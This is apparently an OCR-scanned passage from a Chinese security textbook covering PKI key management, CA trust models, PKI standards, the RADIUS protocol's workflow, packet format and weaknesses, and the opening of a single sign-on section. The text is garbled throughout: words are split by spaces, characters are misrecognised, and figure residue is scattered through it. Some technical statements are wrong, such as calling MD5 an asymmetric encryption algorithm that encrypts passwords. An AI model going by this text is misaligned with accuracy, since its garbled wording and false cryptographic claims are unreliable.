证 书 失 效 ,撤销 或 者 更 新 后 需要 存储 旧 的 证 书 ,也 就 是 证 书 归档 ,以 满足 用 户 对 历史 信 
息 的 查阅 和 验证 要 求 。 因 为 用 旧 证 书签 名 或 加 密 的 信息 无 法 用 新 证 书 进 行 认证 或 解密 ， 
PKI 通过 证 书 归 档 以 保证 安全 服务 的 持续 性 。 

5) 密 钥 管理 

在 PKI 系 统 中 , 密 钥 管理 主要 包括 密 钥 生成 、 密 钥 备 份 和 恢复 、 密 钥 更 新 、 密 钥 销 毁 和 
归档 处 理 等 。 

PKI 技术 要 求 每 个 用 户 拥有 两 对 公私 密 钥 。 其 中 一 对 用 于 数据 加 密 和 解密 , 另 一 对 用 
于 数字 签名 和 校 验 签名 ,以 支持 数字 签名 的 不 可 否认 性 。 这 两 对 密 钥 在 管理 上 的 要 求 并 不 
一 样 。 

(1) 密 钥 生成 。 

用 于 加 密 / 解 密 的 密 钥 对 可 以 在 客户 端 生成 ,也 可 以 在 一 个 可 信 的 第 三 方 机 构 生 成 。 如 
果 在 异地 生成 该 密 钥 对 ,必须 能 够 保证 将 其 安全 地 传输 到 客户 端 供 客 户 使 用 。 

用 于 签名 / 校 验 的 密 钥 对 一 般 要 求 在 客户 端 生 成 ,特殊 情况 下 (例如 客户 端 没有 能 力 生 
成 密 钥 对 ) 可 以 在 一 个 可 信 的 第 三 方 生成 。 但 是 ,该 密 钥 对 中 用 于 签名 的 私 钥 只 能 由 用 户 自 
身 唯 一 拥有 ,严禁 在 网 络 中 传输 ,或 存放 于 网 络 中 的 其 他 地 方 。 如 果 该 密 钥 对 是 由 第 三 方 生 
成 的 , 则 在 用 户 获得 该 密 钥 对 后 ,第 三 方 必须 销毁 其 中 的 私 钥 。 但 用 于 校 验 签名 的 公 钥 可 以 
在 网 络 中 传输 ,还 可 以 随处 发 布 。 

(2) 密 钥 备份 和 恢复 。 

PKI 要求 应 用 系统 提供 密 钥 备份 与 恢复 功能 。 当 用 户 忘记 密 钥 访问 口令 或 存储 用 户 密 
钥 的 设备 损坏 时 ,可 以 利用 此 功能 恢复 原来 的 密 钥 对 ,从 而 使 原来 加 密 的 信息 可 以 正确 
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解密 。 

并 不 是 用 户 的 所 有 密 钥 都 需要 备份 ,也 并 不 是 任何 机 构 都 可 以 备份 密 钥 。 可 以 备份 的 
密 钥 仅 限于 用 于 加 密 / 解 密 的 密 钥 对 ,而 用 于 签名 / 校 验 的 密 钥 对 则 不 可 备份 ,否则 将 无 法 保 
证 用 户 签名 信息 的 不 可 否认 性 。 用 于 签名 / 校 验 的 密 钥 对 在 损坏 或 泄露 后 必须 重新 产生 。 
可 以 备份 密 钥 的 应 该 是 可 信 的 第 三 方 机 构 , 如 CA、 专用 的 备份 服务 器 等 。 

(3) 密 钥 更 新 。 

密 钥 的 使 用 是 存在 有 效 期 的 。 当 密 钥 到 期 时 ,PKI 应 用 系统 应 该 可 以 自动 为 用 户 进 行 
密 钥 更 新 。 也 可 以 由 用 户主 动向 RA 申请 更 新 ,同时 进行 证 书 更 新 。 

(4) 密 钥 归档 。 

当 用 于 加 密 / 解 密 的 密 钥 对 成 功 更 新 后 ,原来 使 用 的 密 钥 对 必须 进行 归档 处 理 , 以 保证 
原来 的 加 密 信息 可 以 正确 地 解密 。 但 用 于 签名 / 校 验 的 密 钥 对 成 功 更 新 后 ,原来 密 钥 对 中 用 
于 签名 的 私 钥 必 须 安全 地 销毁 ; 而 原来 密 钥 对 中 用 于 校 验 签名 的 公 钥 要 归档 管理 ,以 便 将 
来 对 旧 的 签名 信息 进行 校 验 。 

PKI 系 统 的 密 钥 管理 总 体 来 说 应 该 是 自动 的 ,并 且 是 对 用 户 透明 的 。 有 的 PKI 系统 还 
要 求 能 为 一 个 用 户 管理 多 对 密 钥 和 证 书 , 能 够 提供 对 密 钥 周 期 和 用 途 等 进行 设置 的 安全 策 
略 编辑 和 管理 工具 。 好 的 密 钥 管理 能 提高 PKI 系统 的 扩展 性 和 降低 运行 成 本 。 

5. 信任 模型 

通常 一 个 CA 为 一 个 有 限 的 用 户 团体 提供 服务 ,这样 的 用 户 团体 通常 被 称 为 安全 领域 
(Security Domain) 。 大 型 网 络 系统 中 往往 存在 多 个 CA, 所 以 PKI 需要 建立 不 同安 全 领域 
之 间 的 相互 信任 关系 。 信 任 模型 是 PKI 中 建立 信任 关系 和 验证 证 书 时 寻找 和 遍历 信任 路 
径 的 模型 。 

1) 单 CA 信任 模型 

单 CA 信任 模型 是 最 基本 的 信任 模型 , 即 整个 PKI 系统 中 只 有 一 个 CA。 该 CA 为 系 
统 中 所 有 用 户 提供 安全 服务 ,被 所 有 用 户 所 信任 ,如 图 3. 14 所 示 。 

单 CA 信任 模型 容易 实现 ,易于 管理 ,只 需要 建立 一 个 CA, 所 有 用 户 之 间 都 能 
相互 认证 。 但 是 ,该 模型 对 于 拥有 大 量 用 户 或 不 同 的 用 户 群 体 的 系统 支持 困难 。 

2) 严格 层次 信任 模型 

在 严格 层次 信任 模型 中 ,通过 CA 间 的 主 从 关系 建立 信任 模型 。 可 以 用 一 棵 
倒置 的 树 对 其 进行 描述 ,如 图 3. 15 所 示 。 

这 种 模型 中 有 一 个 特殊 的 CA 称 为 根 CA ,每 个 用 户 都 知道 根 CA 的 公 钥 ,所 有 用 户 都 
信任 根 CA, 根 CA 的 证 书 由 自己 签发 。 根 CA 下 可 以 有 零 层 或 多 层 子 CA, 上 层 CA 为 下 层 
CA 签发 证 书 , 倒 数 第 二 层 的 子 CA 为 以 它 为 根 的 用 户 群 体 签发 证 书 , 通 常 其 他 层 的 CA 不 
直接 为 用 户 签发 证 书 。 该 模型 中 的 信任 关系 是 单 向 的 ,各 级 CA 组 成 了 一 个 信任 链 。 两 个 
用 户 进行 相互 认证 时 ,双方 都 提供 自己 的 证 书 和 签名 ,通过 根 CA 来 对 证 书 进 行 有 效 性 和 真 
实 性 的 认证 。 

严格 层次 信任 模型 具有 扩展 性 好 的 优点 ,比较 容易 增加 新 的 信任 域 ,而 且 证 书 路 径 长 度 
一 般 不 会 很 长 。 但 是 单个 CA 的 失败 会 影响 整个 PKI 体系 ,影响 的 大 小 与 其 离 根 CA 的 距 
离 相关 , 根 CA 的 失效 将 导致 整个 PKI 系统 的 失效 。 

3) 网 状 信任 模型 


图 单 CA 信任 模型 
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网 状 信 任 模 型 又 称 为 分 布 式 信任 模型 ,与 严格 层次 信任 模型 相反 ,网 状 信任 模型 将 信任 


分 散 到 两 个 或 多 个 CA 上 ,如 图 3. 16 所 示 。 
OO = 
一 -一 相互 认证 





图 3.15 严格 层次 信任 模型 图 3.16 网 状 信 任 模型 


如 果 任 意 两 个 CA 间 都 存在 相互 认证 , 则 这 种 模型 成 为 严格 网 状 信任 模型 。 有 的 复杂 
系统 中 会 结合 网 状 模型 与 层次 模型 ,建立 混合 型 信任 模型 。 

网 状 模型 具有 更 好 的 灵活 性 ,单个 CA 的 安全 性 对 整个 PKI 系统 的 影响 有 限 。 增 加 新 
的 认证 域 也 方便 ,只 要 新 的 CA 与 网 中 其 他 至 少 一 个 CA 建立 信任 关系 即 可 。 但 是 ,网 状 模 
型 也 存在 认证 路 径 发 现 难 和 实现 复杂 的 缺点 。 

4) 桥 CA 信任 模型 

桥 模型 被 设计 用 来 克服 层次 模型 和 网 状 模型 的 缺点 和 链接 不 同 的 PKI 体系 。 桥 CA 
通过 分 别 与 多 个 信任 域 的 CA 进行 交叉 认证 的 方式 ,建立 不 同 信任 域 的 CA 之 间 的 信任 路 
径 , 从 而 实现 不 同 信 任 域 实体 之 间 的 互 连 、 互 通 、 互 操作 ,允许 用 户 保持 原 有 的 信任 CA, 如 
图 3.17 所 示 。 桥 CA 不 同 于 树 状 结构 和 网 状 结构 中 的 CA, 它 不 直接 向 用 户 签发 证 书 , 它 也 
不 像 根 CA 那样 是 可 信和 实体 。 如 同 网 络 中 使 用 的 集线器 ,任何 结构 类 型 的 PKI 都 可 以 通过 
桥 CA 连接 在 一 起 ,实现 彼此 间 的 信任 。 


一 一 一 颁发 证 书 
DOR 





图 3.17 桥 CA 信任 模型 


桥 CA 的 实用 性 很 强 , 代 表 了 现实 世界 中 证 书 机 构 的 相互 关系 ,证 书 路 径 较 易 发 现 , 路 
径 较 短 。 但 桥 CA 存在 证 书 路 径 的 有 效 发 现 和 确认 困难 、 证 书 复杂 、 证 书 和 证 书 状态 信息 获 
取 困 难 、 大 型 PKI 目录 的 互 操作 性 不 方便 的 缺点 。 

5) 以 用 户 为 中 心 的 信任 模型 
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在 以 用 户 为 中 心 的 信任 模型 中 ,每 个 用 户 自己 决定 信任 哪些 证 书 。 用 户 自己 就 是 自己 
的 根 CA ,没有 可 信 的 第 三 方 作为 CA, 如 图 3. 18 所 示 。 


GCC 


3.18 以 用 户 为 中 心 的 信任 模型 


这 种 模型 中 用 户 的 可 控 性 很 强 。 例 如 用 户 A 收 到 一 个 标明 是 B 的 证 书 , 但 是 发 现 该 证 
书 是 由 他 不 认识 的 C 签名 的 ,但 是 C 的 证 书 是 由 用 户 认 识 且 信 任 的 D 签名 的 ,于 是 就 存在 
一 个 从 了 D 到 C 到 B 的 密 钥 链 。 这 时 用 户 可 以 自我 决定 是 否 信任 B 的 证 书 。 

这 种 模型 对 用 户 自 身 的 决策 能 力 要 求 较 高 ,所 以 一 般 适用 于 技术 水 平 较 高 和 利害 关系 
高 度 一 致 的 群体 中 ,不 适用 于 金融 或 政府 环境 ,因为 这 些 环境 通常 是 需要 对 用 户 的 信任 行为 
实行 某 种 控制 的 。 

6) Web 信任 模型 

Web 信任 模型 建立 在 浏览 器 的 基础 之 上 ,浏览 器 中 内 置 了 多 个 根 CA, 各 个 根 CA 间 是 
相互 平行 的 ,浏览 器 用 户 信任 这 些 根 CA ,如 图 3. 19 所 示 。 由 于 这 些 根 CA 是 由 浏览 器 厂商 
内 置 的 ,厂商 隐 含 认证 了 这 些 根 CA ,所 以 浏览 器 厂商 是 实际 上 的 根 CA。 


一 一 颁发 证 书 








3.19 ”Web 信任 模型 


Web 信任 模型 操作 性 强 , 使 用 方便 ,对 用 户 的 要 求 较 低 。 但 是 .存在 安全 性 较 差 和 根 
CA 与 用 户 的 信任 关系 模糊 的 缺点 。 骨 入 的 多 个 根 CA 只 要 有 一 个 失效 ,安全 性 也 将 被 破 
坏 , 而 且 没有 实用 的 机 制 来 发 现 和 撤销 失效 的 根 CA。 另 外 ,用 户 很 难 知道 某 个 浏览 器 嵌入 
了 哪些 根 CA ,也 无 法 知道 这 些 根 CA 的 依托 方 是 谁 。 

6. PKI 相关 的 国际 标准 

与 PKI 相关 的 国际 标准 可 以 分 为 两 类 : 一 类 用 来 定义 PKI, 另 一 类 依赖 于 PKI。 

1) 定义 PKI 的 标准 

在 PKI 系 统 中 ,用 户 的 注册 流程 .数字 证 书 的 格式 .CRL 的 格式 、 证 书 的 申请 格式 以 及 
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数字 签名 格式 等 都 有 相关 的 国际 标准 进行 了 严格 的 定义 。 

。 X. 509。 由 国际 电信 联盟 ITU 制定 ,用 来 对 PKI 中 的 数字 证 书 进行 规范 化 定义 。 

。 PKCS。 由 美国 RSA 数据 安全 公司 及 其 合作 伙伴 制定 的 一 组 公 钥 密码 学 标准 ,内 容 
包括 证 书 申请 、 证 书 更 新 .CRL 发 布 . 数 字 签名 、 扩 展 证 书 以 及 数字 信封 的 格式 等 方 
面 的 一 系列 标准 。 

。 PKIX。 由 IETF 组 织 中 的 PKI 工作 小 组 制定 ,主要 定义 了 PKI 系统 中 的 用 户 .CA、 
RA 和 证 书 存 取 库 等 的 模型 。 

2) 依赖 于 PKI 的 标准 

当前 有 很 多 依赖 于 PKI 的 安全 标准 ,如 安全 的 套 接 层 协 议 (SSL), 传 输 层 安全 协议 

(TLS) ,安全 的 多 用 途 互联 网 邮件 扩展 协议 (S/MIME) 、IP 安全 协议 (IP Sec) 等 。 

。 S/MIME。 是 一 个 用 于 发 送 安 全 报 文 的 IETF 标准 。 它 采用 了 PKI 数字 签名 技术 
并 支持 消息 和 附件 的 加 密 , 无 须 收发 双方 共享 相同 密 钥 ,S/MIME 采用 PKI 技术 标 
准 来 实现 ,并 适当 地 扩展 了 PKI 的 功能 。 目 前 该 标准 包括 密码 报 文 语法 、 报 文 规 
范 \ 证 书 处 理 以 及 证 书 申请 语法 等 方面 的 内 容 。 

。 SSL/TIS。 是 互联 网 中 访问 Web 服务 器 最 重要 的 安全 协议 ,也 可 以 应 用 于 基于 客 
户 /服务 器 模型 的 应 用 系统 ,SSL/TLS 都 利用 PKI 的 数字 证 书 来 认证 客户 和 服务 器 
的 身份 。 

。 IPSec。 是 IETF 制定 的 IP 层 加 密 协议 ,采用 了 PKI 中 进行 加 密 和 认证 过 程 的 密 钥 
管理 的 功能 。IPSec 主要 用 于 开发 新 一 代 的 VPN。 

3.3.3.2 RADIUS 协议 


1. AAA 简介 

AAA 是 Authentication( 认 证 )、Authorization( 授 权 ) 和 Accounting( 计 费 ) 的 简称 。 这 
里 的 认证 就 是 本 章 所 指 的 对 用 户 的 身份 进行 验证 ,判断 其 是 否 为 合法 用 户 。 授 权 是 指 当 用 
户 身份 被 确认 合法 后 ,赋予 该 用 户 能 够 使 用 的 业务 和 拥有 的 权限 ,例如 分 配 一 个 IP 地 址 。 
计 费 是 指 网 络 系统 收集 、 记 录用 户 对 网 络 资源 的 使 用 情况 以 便 向 用 户 收取 费用 和 进行 审计 。 
AAA 是 网 络 运营 的 基础 , 既 保 证 了 合法 用 户 的 权益 ,又 有 效 地 保证 了 网 络 系统 的 运行 
安全 。 

RADIUS(Remote Authentication Dial-In User Service, 远 程 认 证 拨号 用 户 服务 ) 是 使 
用 广泛 的 用 户 接 人 管理 协议 。 最 初 ,Livingston 公司 提出 RADIUS 协议 的 目的 是 简化 认证 
流程 ,便于 进行 大 量 用 户 的 接 入 验证 。 后 来 ,经 过 不 断 扩充 和 完善 ,其 应 用 范围 扩展 到 无 线 
验证 和 VPN 验证 等 领域 ,提供 成 熟 的 AAA 管理 。 

2. RADIUS 的 工作 过 程 

RADIUS 是 基于 UDP 的 应 用 层 协 议 ,认证 使 用 1812 端口 , 计 费 使 用 1813 接口 。 

RADIUS 采用 客户 /服务 器 模式 ,其 中 客户 端 是 指 网 络 接 入 服务 器 (Network Access 
Server， NAS) 或 RADIUS 客户 端 软件 ,服务 器 端 是 指 RADIUS 服务 器 。 

。 客户 端的 功能 是 把 用 户 身 份 信息 (用 户 名 、 密 码 ) 传 输 给 RADIUS 服务 器 ,并 处 理 返 

回 的 响应 。 
。 RADIUS 服务 器 的 功能 是 接收 客户 端 发 来 的 用 户 接 入 请 求 ,对 用 户 身份 进行 验证 ， 
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以 提示 用 户 认证 通过 与 否 ,是 否 需要 Challenge 身份 认证 ,并 返回 给 客户 端 为 其 提供 
服务 所 需 的 配置 信息 。 
RADIUS 服务 器 采用 数据 库 的 形式 中 集中 存放 用 户 的 相关 安全 信息 ,避免 安全 信息 凌 
视 浅 布 带 来 的 不 安全 性， 同时 更 可 靠 且 易于 管理 。 实 施 计 费 时 ,客户 端 将 用 户 的 上 网 时 长 、 
进出 字 节 数 、 进 出 包 数 等 原始 数据 送 到 RADIUS 服务 器 上 ,以 供 RADIUS 服务 器 计 费 时 
使 用 。 
一 个 RADIUS 服务 器 可 以 充当 其 他 RADIUS 服务 器 或 其 他 模式 的 认证 服务 器 的 代 
理 , 以 支持 漫游 功能 。 所 谓 漫游 功能 ,就 是 代理 的 一 个 具体 实现 ,可 以 让 用 户 通 过 本 来 和 其 
无 关 的 RADIUS 服务 器 进行 认证 。 
RADIUS 认证 授权 工作 的 主要 步骤 如 图 3. 20 所 示 。 


(D (2) 
© G) () 请 :， 


用 户 NAS/RADIUS 客 户 器 RADIUS 服务 器 


3.20 RADIUS 认证 授权 过 程 


(1) 用 户 首先 启动 与 客户 端的 连接 (例如 采用 VPN 拨号 、Telnet 等 ) ,输入 用 户 名 和 
密码 。 

(2) 客户 端 采用 非 对 称 加 密 算法 MD5(Message Digest Algorithm 5 ,消息 摘要 算法 第 5 
版 ) 对 密码 进行 加 密 , 再 将 用 户 名 、 密 码 .客户 端 ID 和 用 户 访问 端口 的 ID 等 相关 信息 封装 成 
RADIUS* 接 入 请 求 (Access Request) ”数据 包 并 发 送 给 RADIUS 服务 器 。 

(3) RADIUS 服务 器 对 用 户 进行 认证 ,必要 时 可 以 提出 一 个 Challenge, 收 集 用 户 的 附 
加 信息 以 进一步 对 用 户 进行 认证 。 

(4) 如 果 用 户 通 过 认证 ,RADIUS 服务 器 向 客户 端 发 送 “ 人 允许 接 人 (Access Accept)” 数 
据 包 。 如 果 用 户 信息 没有 通过 认证 (用 户 名 或 口令 不 正确 ), 则 向 客户 端 发 送 “ 拒 绝 接 人 
(Access Reject) ”数据 包 ,或 者 是 发 送 “ 重 新 输入 口令 (Change Password) ”数据 包 要 求 用 户 
重新 输入 口令 。 

(5) 车 客户 端 收 到 的 是 允许 接 入 包 , 则 向 RADIUS 服务 器 提出 计 费 请 求 (Account 
Require) ,RADIUS 服务 器 进行 响应 (Account Accept) ,对 用 户 的 计 费 开始 。 同 时 ,授予 用 
户 相应 的 权限 以 允许 用 户 进 行 自己 的 相关 操作 。 如 果 客 户 端 收 到 的 是 拒绝 接 人 包 , 则 是 拒 
绝 用 户 的 接 和 人 请求。 

3. RADIUS 数据 包 格 式 


RADIUS 数据 包 格式 如 图 3. 21 所 示 。 

1) Code 

Code 字段 长 度 为 1B, 用 于 区 分 RADIUS 数据 包 的 类 型 。 常 用 的 Code 值 ( 十 进 制 ) 和 
应 的 数据 包 类 型 如 下 : 

Code 二 1, 接 入 请 求 (Access-Request)。 

Code 王 2 , 接 人 人 允许 (Access-Accept) 。 

Code 二 3, 接 入 拒绝 (Access-Reject)。 
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图 3.21 RADIUS 数据 包 格式 


Code 二 4, 计 费 请 求 (Accounting-Request)。 

Code 二 5, 计 费 响应 (Accounting-Response)。 

Code 二 11, 接 入 询问 (Access-Challenge)。 

Code 二 12, 服 务 器 状态 (Status-Server(experimental))。 

Code 二 13, 客 户 端 状态 (Status-Client(experimental) ) 。 

Code 一 255 , 预 留 (Reserved) 。 

2) Identifier 

Identifier 字段 长 度 为 1B, 用 于 请 求 和 应 答 包 的 匹配 ,一 般 是 短期 内 不 重复 的 数值 。 
RADIUS 服务 器 能 检测 出 具有 相同 的 客户 源 IP 地 址 、 源 UDP 端口 及 标识 符 的 重复 请 求 。 

3) Length 

Length 字段 长 度 为 2B, 用 于 表示 RADIUS 数据 包 ( 包 括 Code Identifier、 Length、 
Authenticator、Attributes) 的 总 长 度 ,最 小 为 20B, 最 大 为 4096B。 数 据 包 超 出 长 度 域 所 指 
示 的 部 分 将 被 看 作 是 填充 字 节 而 被 忽略 (不 接收 ), 如 果 数 据 包 大 小 比 长 度 域 所 指示 的 小 , 则 
必须 丢弃 该 分 组 。 

4) Authenticator 

Authenticator 字段 长 度 为 16B, 用 于 验证 RADIUS 服务 器 的 应 答 和 对 用 户口 令 的 加 
密 。 通 过 RADIUS 服务 器 与 客户 端的 共享 密 钥 以 及 请 求 认证 码 (Request Authenticator) 和 
应 答 认证 码 (Response Authenticator) 共 同 支持 发 , 收 数 据 包 的 完整 性 和 认证 。 

(1) 请 求 认 证 码 。 

在 接 入 请 求 数据 包 中 ,请求 认证 码 是 一 个 16B 的 随机 二 进 制 数 。 在 密 钥 的 整个 生存 周 
期 中 ,这 个 值 应 该 是 唯一 且 不 可 预测 的 ,因为 具有 相同 密 钥 的 重复 请 求 值 会 使 黑客 有 机 会 使 
用 已 截取 的 响应 回复 用 户 。 因 为 同一 密 钥 可 以 用 在 不 同 地 理 区 域 中 的 服务 器 的 验证 中 ,所 
以 请 求 认 证 码 应 该 具有 临时 的 全 球 唯一 性 。 

在 请 求 接 入 和 请 求 计 费 数据 包 中 的 请 求 认 证 码 的 生成 方式 是 有 区 别 的 。 对 于 请 求 接 入 
包 , 请 求 认证 码 是 16 个 8B 的 随机 数 。 对 于 计 费 请 求 包 , 认 证 码 是 一 串 由 Code、1dentifier、 
Length、16 个 为 0 的 8B、 请 求 属性 和 共享 密 钥 所 构成 的 字 节 流 经 过 MD5 加 密 算法 计算 出 
的 散 列 值 , 即 

Request_Auth 二 MD5(Code 十 Identifier 十 Length 十 16 个 为 0 的 8B 十 Attributes 十 
Shared Secret) 
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(2) 响应 认证 码 。 

响应 认证 码 是 允许 接 和 人、 拒绝 接 和 人 、 接 入 询问 和 计 费 响应 数据 包 中 的 认证 码 值 , 它 是 一 
串 由 编码 域 ,标识 符 长度, 来 自 接 人 请 求 数据 包 的 请 求 认证 码 和 执行 共享 机 密 的 响应 属性 
构成 的 字 节 流 上 计算 出 的 单 向 MD5 散 列 , 即 

Response_Auth = MD5(Code 十 Identifier 十 Length 十 Request_Auth 十 Attributes 十 
Shared Secret) 

5) Attributes 

Attributes 字段 长 度 可 变 , 由 包含 的 属性 的 类 型 和 长 度 决定 。 每 个 RADIUS 数据 包 可 
以 有 0 个 或 多 个 属性 ,RADIUS 协议 通过 不 同 的 属性 定义 各 种 操作 。 不 同 的 属性 包含 不 同 
的 信息 ,每 个 属性 由 3 部 分 组 成 : 类 型 (Type) .长度 (Length)、 属 性 值 (Value) 。 用 户 可 以 根 
据 实际 需要 在 不 中 断 已 存在 协议 执行 的 前 提 下 自行 定义 新 的 属性 。 有 关 属 性 的 详细 内 容 可 
以 参看 RFC 文档 。 

4. RADIUS 认证 的 安全 措施 

1) 用 户口 令 加 密 

采用 MD5 加 密 算法 对 客户 端 和 RADIUS 服务 器 之 间 传 输 的 用 户口 令 进行 加 密 , 防 止 
口令 泄露 。 

2) 认证 机 制 

客户 端 和 RADIUS 服务 器 之 间 利 用 共享 密 钥 技术 和 认证 码 方式 进行 认证 ,保证 数据 传 
输 的 完整 性 ,机 密 性 ,同时 防止 网 络 上 的 其 他 主机 冒充 客户 端 或 RADIUS 服务 器 。 具 体 实 
现 过 程 如 下 : 

(1) 客户 端 生 成 包括 请 求 认证 码 的 接 入 请 求 数据 包 , 发 送 给 RADIUS 服务 器 。 

(2) RADIUS 服务 器 收 到 客户 端的 接 入 请 求 后 ,根据 用 户 名 在 数据 库 中 查找 匹配 项 。 
如 果 找 到 , 则 采用 与 客户 端 一 致 的 方法 也 产生 一 个 认证 码 。 

(3) 如 果 两 个 认证 码 一 致 , 则 发 送 允 许 接 入 数据 包 给 客户 端 。 否 则 ,发 送 拒绝 接 入 数据 包 。 

(4) RADIUS 服务 器 构造 包含 响应 认证 码 的 响应 数据 包 , 发 送 给 客户 端 。 

(5) 客户 端 收 到 认证 响应 数据 包 后 ,根据 正在 等 待 响应 的 那个 请 求 的 请 求 认证 码 和 响 
应 包 的 内 容 也 产生 一 个 响应 认证 码 , 将 这 个 响应 认证 码 与 RADIUS 服务 器 发 送 来 的 认证 码 
相 比较 。 若 相等 , 则 认证 通过 ,建立 连接 ,和 否则 认证 失败 。 

3) 用 户 与 客户 端 之 间 的 认证 

RADIUS 协议 可 以 支持 多 种 用 户 与 客户 端 之 间 的 认证 方式 ,例如 PAP(Password 
Authentication Protocol, 密码 认证 协议 )、CHAP (Challenge Handshake Authentication 
Protocol ,挑战 /握手 认证 协议 ) 和 EAP(Extensible Authentication Protocol, 可 扩展 认证 协 
议 )、UNIX 的 登录 操作 (UNIX Login) 等 。 

4) 数据 包 重 传 机 制 

RADIUS 采用 UDP 协议 的 原因 有 两 点 : 一 是 客户 端 和 RADIUS 服务 器 大 多 在 同一 个 
局 域 网 中 ,使 用 UDP 更 加 快捷 方便 ; 二 是 简化 了 服务 端的 实现 。 但 是 UDP 协议 存在 丢 包 
现象 ,所 以 RADIUS 协议 通过 数据 包 重 传 机 制 解决 UDP 数据 包 丢 失 问题 。 

如 果 客 户 端 在 发 出 请 求 ( 接 入 请 求 、 计 费 请 求 等 ) 后 没有 收 到 响应 信息 ,会 多 次 重 传 请 
求 ,如 果 多 次 重 传 后 仍然 收 不 到 响应 :那么 就 认为 RADIUS 服务 器 已 经 关机 。 这 时 ,客户 端 
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会 向 备用 的 RADIUS 服务 器 发 送 请 求 。 

5) 重 放 攻 击 防范 

为 防止 非法 用 户 的 重 放 攻击 ,如果 在 一 个 很 短 的 时 间 片 段 内 出 现 一 个 具有 相同 的 客户 
源 IP 地 址 、 源 UDP 端口 号 和 标识 符 的 请 求 ,RADIUS 服务 器 将 会 认为 这 是 一 个 重复 请 求 ， 
直接 将 其 丢弃 ,不 做 任何 处 理 。 

5. RADIUS 协议 的 优势 

RADIUS 协议 简单 明确 ,扩展 性 好 ,因此 得 到 了 广泛 应 用 。 该 协议 具有 以 下 特点 : 

。 采用 通用 的 客户 /服务 器 结构 组 网 。NAS 作为 RADIUS 的 客户 端 负 责 将 用 户 信 息 
传递 给 指定 的 RADIUS 服务 器 ,然后 处 理 RADIUS 服务 器 的 返回 结果 。RADIUS 
服务 器 负责 接收 用 户 的 连接 请 求 , 对 用 户 进 行 认证 ,向 客户 端 返回 用 户 配置 信息 。 

。 采用 共享 密 钥 保证 网 络 传输 安全 性 。 客 户 端 与 RADIUS 服务 器 之 间 的 交互 是 通过 
共享 密 钥 来 进行 相互 认证 的 ,以 减少 在 不 安全 的 网 络 中 用 户 密码 被 侦 听 到 的 可 
能 性 。 

。 具 有 良好 的 可 扩展 性 。RADIUS 是 一 种 可 扩展 的 协议 ,所 有 的 交互 报 文 由 多 个 不 同 
长 度 的 ALV(Attribute-Length-Value, 属 性 -长 度 - 值 ) 三 元 组 组 成 ,新 增加 属性 和 属 
性 值 不 会 破坏 协议 的 原 有 实现 。 因 此 RADIUS 协议 也 支持 设备 厂商 扩充 厂家 专 有 
属性 。 

。 协议 认证 机 制 灵活 。RADIUS 协议 认证 机 制 灵活 ,支持 多 种 认证 用 户 的 方式 。 如 果 
用 户 提供 了 用 户 名 和 用 户 密码 的 明文 ,RADIUS 协议 能 够 支持 PAP、.CHAP、UNIX 
login 等 多 种 认证 方式 。 

RADIUS 协议 简单 明确 ,扩展 性 强 , 因 此 得 到 了 广泛 应 用 。 在 普通 电话 拨号 上 网 、 
ADSL 拨号 上 网 ,社区 宽带 上 网 .VPDN 业务 ,移动 电话 预付 费 等 业务 中 都 能 见 到 RADIUS 
的 身影 。 

6. RADIUS 协议 存在 的 问题 


RADIUS 协议 具有 开放 性 、 可 扩展 性 、 灵 活性 等 优点 ,并 且 可 以 和 在 其 他 AAA 安全 协 
议 ( 如 TACACS 十 、Kerberos 等 ) 共 用 。 但 是 , 随 着 网 络 技术 的 不 断 发 展 (例如 移动 IP、 
NGN.3G 等 ) ,RADIUS 协议 存在 以 下 问题 。 

1) 多 协议 支持 

RADIUS 只 支持 IP 协议 ,不 支持 ARA(AppleTalk Remote Access,AppleTalk 远程 访 
问 ) .NBFCP(NetBIOS Frame Control Protocol, 网 络 基 本 输入 输出 系统 帧 控制 协议 )、IPX、 
X. 25 PAD connections(X. 25 PAD 连接 ) 和 NASI( 异 步 服 务 接口 ) 等 协议 。 

2) 安全 性 

RADIUS 协议 中 ,对 用 户 密码 属性 采取 的 算法 为 UserPassword 王 Password( 不 足 16 
位 填 0)XOR MD5( 公 用 密 钥 十 请 求 认证 ), 即 用 户 密码 是 由 原始 的 用 户 密码 和 公用 密 钥 与 
请 求 认 证 的 MD5 值 的 异 或 来 表示 的 。 针 对 这 种 算法 ,破坏 者 可 以 通过 对 大 量 截 获 的 数据 
进行 分 析 从 而 猜测 用 户 密码 ,存在 安全 隐患 。 

RADIUS 协议 采用 的 是 共享 密 钥 ,而 且 用 户 密 码 以 明文 的 方式 存放 于 数据 库 中 ,所 以 
系统 内 部 的 安全 破坏 (共享 密 钥 的 泄露 管理 员 的 泄密 ) 将 会 造成 整个 AAA 功能 的 失效 。 
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另外 , RADIUS 在 认证 或 计 费 需要 通过 代理 链 的 情况 下 无 法 提供 端 到 端的 安全 性 。 

RADIUS 协议 并 不 要 求 支持 IPSec 和 TLS, 没 有 提供 统一 的 传输 层面 上 的 安全 。 

3) 可 扩展 性 

当 用 户 越 来 越 多 时 ,由 于 RADIUS 协议 中 没有 中 继 器 和 重 定向 器 ,所 以 只 能 不 断 增加 
新 的 AAA 服务 器 。 如 果 能 够 很 好 地 支持 中 继 、 代 理 和 重 定向 器 ,就 可 以 把 用 户 分 组 ,把 系 
统管 理 的 能 力 分 散 到 每 个 组 ,也 能 对 来 自 不 同 组 的 请 求 加 以 集中 处 理 ,并 转发 到 合适 的 目 
标 ,同时 还 能 很 好 地 实现 负载 均衡 。 

4) 故障 切换 

RADIUS 中 没有 明确 定义 故障 转移 和 故障 恢复 机 制 。 


3.4 单 点 登录 


所 谓 单 点 登录 (SSO) 是 指 在 多 个 应 用 系统 中 ,用 户 只 需 登 录 一 次 即 可 访问 所 有 相互 信 
任 的 应 用 系统 ,而 不 需要 再 进行 额外 的 身份 认证 。IBM 公司 对 其 有 一 个 形象 的 解释 :“ 单 点 
登录 ,全 网 漫游 ”"。 实 施 单 点 登录 是 目前 流行 的 企业 信息 系统 集成 的 重要 组 成 部 分 ,具有 以 
下 优点 : 
。 提高 了 用 户 工 作 效率 。 用 户 在 不 同系 统 中 进行 登录 所 耗费 的 时 间 减 少 了 。 由 于 用 
户 不 需要 记忆 多 组 账号 和 口令 ,也 降低 了 用 户 登录 出 错 的 可 能 性 。 

。 方便 了 系统 管理 员 对 用 户 的 管理 。 大 多 数 单 点 登录 系统 采取 对 用 户 身份 信息 的 集 
中 存储 ,便于 系统 管理 员 增加 、 删 除 用 户 和 修改 用 户 权限 。 

"增强 了 网 络 安全 性 。 用 户 每 使 用 一 次 身份 凭证 ,就 增加 了 一 次 凭证 泄露 和 被 截获 的 
